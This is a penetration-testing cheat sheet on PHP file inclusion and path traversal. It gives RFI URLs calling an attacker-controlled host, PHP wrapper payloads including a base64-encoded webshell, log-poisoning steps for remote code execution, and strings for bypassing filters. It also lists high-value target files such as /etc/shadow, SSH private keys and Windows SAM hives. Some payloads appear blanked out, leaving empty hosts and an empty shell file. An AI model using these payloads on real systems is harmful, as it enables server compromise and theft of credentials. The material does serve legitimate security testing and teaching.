# File Inclusion ## Introduction Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities that allow an attacker to include a file into the server due to dynamic file inclusion mechanisms implemented in the target application without proper validation. These vulnerabilities can lead to: * Server-side code execution * XSS attacks * Denial of Service (DoS) * Sensitive Information Disclosure ## Remote File Inclusion Remote File Inclusion (also known as RFI) instead of accessing a file on the victim's machine, the attacker retrieves files from other servers or its machine, obtaining code execution. ```bash http://example.com/index.php?file=http:///webshell.php http://example.com/index.php?page=\\attacker.com\shared\mal.php ``` ## Local File Inclusion Local file inclusion (also known as LFI) is the process of including files that are already locally present on the victim's server, allowing an attacker to read files. Moreover, if the server runs with high privileges, the attacker may access sensitive information or obtain code execution. Furthermore, this vulnerability is usually associated with another vulnerability named **path traversal** or directory traversal, which aims to access files and directories stored outside the default web folder. Finally, in this subsection, you will file several techniques that you can apply to the LFI vulnerability. ## PHP Wrappers Sometimes, the attacker will want to get particular files like binary or .php files, but the files are displayed incorrectly or interpreted in the case of `*.php` files. For these cases, wrappers are used. * **Base64**: Encode the file into base64 format. ```bash http://IP/index.php?page=php://filter/convert.base64-encode/resource= ``` * **ZIP**: The server can execute the code inside a zip file. **Payload**: ```bash echo "" > shell.php zip -0 payload.zip shell.php; rm shell.php ``` **Exploitation**: Once uploaded, you can obtain RCE by accessing the following URL ```bash http://localhost/index.php?file=zip://payload.zip%23shell.php&cmd=id ``` * **Data**: The data wrapper allows you to include embedded information in the URL, including PHP code. The best way to have code is to pre-encode the code in base64. However, this wrapper only works if the `allow_url_include` is "On" at `php.ini`. ```bash http://localhost/index.php?cmd=id&file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bDQo= ``` * **Input**: This wrapper is similar to the data wrapper, but differs in that the information is sent via a POST request. It also requires the `allow_url_include` option to be enabled, ```bash cat shell.php curl -s -X POST -d @shell.php "http://localhost/index.php?cmd=id&file=php://input" uid=0(root) gid=0(root) groups=0(root) ``` * **Expect**: This wrapper is not installed by default, but if it is, it allows remote execution, displaying both STDOUT and STDERR. This happens because this wrapper gives access to a PTY (pseudo-teletype). ```bash http://example.com/index.php?file=expect://whoami ``` ## LFI2RCE LFI can be helpful to trigger RCE via obtaining special files on the system. ```bash http://10.11.1.113/alertConfigField.php?urlConfig=../../../usr/local/databases/shell.php&cmd=id ``` ### Log Poisoning The most common technique to obtain RCE is through poisoning and accessing the Apache `/var/log/apache2/access.log` file. 1\. Inject PHP code in the `User-Agent` variable on a server request. ```bash [...] User-Agent: [...] ``` 2\. Then, access the apache log file to obtain RCE. ```bash http://example.com/?view=dog/../../var/log/apache2/access.log&cmd=whoami ``` ## Path Traversal Allows an attacker to access arbitrary files on the server where the application is running. A common case to retrieve arbitrary files from the server is trying to access upper folders on the path. For instance, if the absolute path for the images folder is `/var/www/html/images/` we can retrieve the file `/etc/passwd` with the following path. ```bash http://example.com/?view=images/../../../../etc/passwd ``` In this section I will show you the techniques that you can use to discover a Path traversal vulnerability. ### Absolute paths You might be able to use an absolute path from the filesystem root, such as `filename=/etc/passwd`, to directly reference a file without using any traversal sequences. ### Sequences stripped non-recursively An application could delete the occurrence of the string `../`. However, if the application doesn't remove it recursively by using the string `....//` , the resulting string would be `../` still being vulnerable to path traversal. ### Double URL-encode If the application only one time URL decode the string in order to find a path traversal technique, an attacker could double URL encode the string `../` turning the string into `%252E%252E%252F`. ### Validation of start of path Some applications check that the beginning of the path to avoid path traversal. However, by using relative paths, the directory path can still be exploited. For instance, if the application checks that the images must be downloaded from `images/` , an attacked can submit the path `images/../../../../etc/passwd` to bypass the filter. ### Validation of file extension Most applications check the file extension of the files to be loaded into the web application to avoid loading arbitrary files. However, there are different techniques that can be used to bypass this filter. #### Null byte Null bytes can be used to circumvent this security technique, as can be seen in the following example. ```bash http://example/file=http:///Revshells/shell.php%00.png ``` #### Comments Adding the `#` or `%23` before the original file, commenting the file path, might allow you to bypass the filter. ```bash http://example/file=/etc/passwd#image.png ``` #### Parameter In the same way as the comment, the original file can be added to the URL as the value of a made-up parameter like so. ```bash http://example/file=/etc/passwd?fake=image.png ``` #### Miscellany Here you have a set of bypasses that can you can try out if you run out of ideas: ```bash webshell.php%0A.png webshell.php\n.png webshell.php\u000a.png webshell.php\u560a.png webshell.php%E5%98%8A.png webshell.php;.png webshell.php%3B.png webshell.php\u003b.png webshell.php\u563b.png webshell.php%E5%98%BB.png ``` ## Fuzzing In order to obtain which files are accessible through LFI, the attacker can fuzz the web application with different dictionaries. ```bash ffuf -u http://example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=FUZZ -w file_inclusion_linux.txt -fs 0-1000 ``` ### Windows Wordlist with interesting windows files: * [List of windows files](https://raw.githubusercontent.com/Marmeus/Kali-Booster/refs/heads/main/Assets/Wordlists/LFI/windows_files.txt) * [Windows & Linux](https://raw.githubusercontent.com/Marmeus/Kali-Booster/refs/heads/main/Assets/Wordlists/LFI/lfi.txt) Some interesting files that might exist on the system: ```bash # System Files c:\WINDOWS\system32\eula.txt c:\boot.ini c:\WINDOWS\win.ini c:\WINNT\win.ini c:\WINDOWS\Repair\SAM windows\repair\SAM %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system # Web Files c:\WINDOWS\php.ini c:\WINNT\php.ini c:\Program Files\Apache Group\Apache\conf\httpd.conf c:\Program Files\Apache Group\Apache2\conf\httpd.conf c:\Program Files\xampp\apache\conf\httpd.conf c:\php\php.ini c:\php5\php.ini c:\php4\php.ini c:\apache\php\php.ini c:\xampp\apache\bin\php.ini c:\home2\bin\stable\apache\php.ini c:\home\bin\stable\apache\php.ini// Some code ``` ### Linux Wordlist with interesting Linux files: * [file\_inclusion\_linux.txt - CarlosPolop](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt) * [ist.txt - hussein98](https://github.com/hussein98d/LFI-files/blob/master/list.txt) Some interesting files that might exist on the system: ```bash # File system users and groups /etc/shadow /etc/passwd /etc/group /etc/hostname /etc/hosts /etc/crontab /etc/host.conf /etc/resolv.conf /etc/issue /etc/samba/smb.conf /dev/tcp// /etc/sudoers /etc/os-release /etc/ls-release /etc/lsb-release /etc/redhat-release /etc/*-release # Command history files ~/.bash_history /root/.bash_history ~/.zsh_history /root/.zsh_history ~/.mysql_history /root/.mysql_history # SSH Files ~/.ssh/authorized_keys ~/.ssh/id_rsa ~/.ssh/id_rsa.keystore ~/.ssh/id_rsa.pub ~/.ssh/known_hosts /root/.ssh/authorized_keys /root/.ssh/id_rsa /root/.ssh/id_rsa.keystore /root/.ssh/id_rsa.pub /root/.ssh/known_hosts # Filesystems to be mounted at boot time /etc/fstab # Currently mounted filesystems. /etc/mtab # Process files /proc/sched_debug /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/net/fib_trie /proc/version /proc/self/environ /proc/self/cmdline # Logs /etc/httpd/logs/acces_log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/access.log /var/log/httpd/error_log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/access_log /var/log/nginx/access.log /var/log/nginx/error.log /var/log/httpd/error_log # Web Files /etc/apache2/apache2.conf /etc/httpd/conf/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/apache2/sites-enabled/default-ssl.conf ``` ## References * [Testing for Remote File Inclusion (OWASP)](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion) * [Testing for Local File Inclusion (OWASP)](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion) * [FILE INCLUSION VULNERABILITIES (Offensive-Security)](https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/) * [File Inclusion (PayloadsAllTheThings)](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion) * [Directory Traversal](https://portswigger.net/web-security/file-path-traversal)